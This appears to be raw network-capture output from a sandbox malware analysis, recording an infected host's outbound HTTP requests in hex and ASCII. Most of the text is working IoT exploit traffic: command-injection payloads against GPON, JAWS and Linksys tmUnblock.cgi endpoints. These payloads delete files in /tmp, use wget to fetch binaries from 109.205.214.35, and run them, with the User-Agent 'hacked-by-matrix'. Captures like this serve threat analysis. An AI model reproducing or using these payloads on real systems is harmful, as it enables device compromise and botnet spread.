                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        636192.168.2.134381642.233.20.131443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:44.610156059 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        637192.168.2.133545423.111.78.17580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:44.871323109 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:45.039710045 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:22:44 GMT
                                                        Server: Apache
                                                        Accept-Ranges: bytes
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
                                                        Mar 21, 2024 05:22:45.039773941 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d
                                                        Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
                                                        Mar 21, 2024 05:22:45.039913893 CET1286INData Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72
                                                        Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
                                                        Mar 21, 2024 05:22:45.039982080 CET1286INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
                                                        Mar 21, 2024 05:22:45.040004015 CET1286INData Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66
                                                        Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
                                                        Mar 21, 2024 05:22:45.040102959 CET1286INData Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33
                                                        Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
                                                        Mar 21, 2024 05:22:45.040164948 CET1096INData Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38
                                                        Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
                                                        Mar 21, 2024 05:22:45.040209055 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to ded.vgame.ca's <a href="mailto:root@ded.vgame.ca?s
                                                        Mar 21, 2024 05:22:45.040277004 CET356INData Raw: 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c
                                                        Data Ascii: logo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 2


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        638192.168.2.133548423.111.78.17580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:45.039298058 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:45.202704906 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:22:44 GMT
                                                        Server: Apache
                                                        Accept-Ranges: bytes
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
                                                        Mar 21, 2024 05:22:45.202764988 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d
                                                        Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
                                                        Mar 21, 2024 05:22:45.202805042 CET1286INData Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72
                                                        Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
                                                        Mar 21, 2024 05:22:45.202872038 CET1286INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
                                                        Mar 21, 2024 05:22:45.202919006 CET1286INData Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66
                                                        Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
                                                        Mar 21, 2024 05:22:45.202977896 CET1286INData Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33
                                                        Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
                                                        Mar 21, 2024 05:22:45.203047991 CET1096INData Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38
                                                        Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
                                                        Mar 21, 2024 05:22:45.203141928 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to ded.vgame.ca's <a href="mailto:root@ded.vgame.ca?s
                                                        Mar 21, 2024 05:22:45.203154087 CET356INData Raw: 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c
                                                        Data Ascii: logo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 2


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        639192.168.2.135083223.227.43.10780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:45.127906084 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        640192.168.2.133648052.21.163.5880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:45.137276888 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:45.232594967 CET146INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        641192.168.2.1356194222.218.187.568080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:45.490068913 CET430OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:22:49.516239882 CET430OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
